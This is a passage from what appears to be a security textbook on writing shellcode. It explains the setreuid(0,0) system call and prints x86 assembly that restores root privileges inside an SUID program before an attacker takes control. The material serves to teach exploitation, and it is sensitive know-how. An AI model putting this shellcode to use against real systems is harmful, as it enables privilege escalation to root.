setreuid System Call
As discussed in Chapter 7, the target of our attack will often be an SUID program. However,
well-written SUID programs will drop the higher privileges when not needed. In
this case, it may be necessary to restore those privileges before taking control. The
setreuid system call is used to restore (set) the process??™s real and effective user IDs.
setreuid Signature
Remember, the highest privilege to have is that of root (0). The signature of the
setreuid(0,0) system call is as follows:
??? eax 0x46 for syscall # 70 (from unistd.h file earlier)
??? ebx First parameter, real user ID (ruid), in this case 0x0
??? ecx Second parameter, effective user ID (euid), in this case 0x0
This time, we will start directly with the assembly.
Starting with Assembly
The following assembly file will execute the setreuid(0,0) system call:
$ cat setreuid.asm
section .text ; start the code section of the asm
global _start ; declare a global label
_start: ; keeps the linker from complaining or guessing
xor eax, eax ; clear the eax registry, prepare for next line
mov al, 0x46 ; set the syscall value to decimal 70 or hex 46, one byte
xor ebx, ebx ; clear the ebx registry, set to 0
xor ecx, ecx ; clear the ecx registry, set to 0
int 0x80 ; call kernel to execute the syscall
mov al, 0x01 ; set the syscall number to 1 for exit()
int 0x80 ; call kernel to execute the syscall
As you can see, we simply load up the registers and call int 0x80.
Pages:
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418